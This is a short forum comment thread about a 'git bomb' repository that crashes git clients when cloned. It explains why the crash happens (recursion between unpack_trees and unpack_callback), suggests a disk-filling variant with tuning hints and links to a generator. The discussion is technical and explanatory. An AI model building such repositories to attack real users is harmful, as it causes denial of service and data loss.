1. 42
  1.  

  2. 4

    This is a rather interesting problem. One the one hand, it means git can compress this kind of content very well. On the other hand, this means any algorithm that can compress this well (like git) will eventually produce such decompression bomb.

    I think Level 2 of this repo would be not having it nuke the memory and rather nuke the disk…

    1. 16

      You could definitely do this! Just keep width ^ depth to a reasonable value and make blob_body large. Some code to make your own git bomb is here: https://github.com/Katee/git-bomb#readme

      1. 6

        (Worth highlighting here that @kate is the author of this blog post.)

    2. 3

      This repo has 15,000 nested tree objects. On my laptop this ends up blowing up the stack

      Where is evidence for a stack overflow?

      Perhaps this runs into git’s behaviour of using mmap on files instead of open/read/write (because on Linux, mmap is considered faster)? mmap space is not infinite.

      1. 13

        If you GDB the git clone you can see where it fails. unpack_trees gets called in a mutually recursive loop with unpack_callback.

        It’s possible to design git repos that hit the mmap limit, but that’s not what is happening in this particular case.

        1. 2

          Thanks for clarifying!

        2. 9

          Just after the bit you quoted is the word “segfault”. Address space running out causing mmap to fail should not usually show up as a segfault (unless the software’s author is silly enough to completely ignore the return value and attempt to dereference MAP_FAILED). It is likely that the article’s author looked at the address of the failed access and confirmed that it was slightly out of bounds for the stack mapping. This is not super hard to check with gdb or lldb.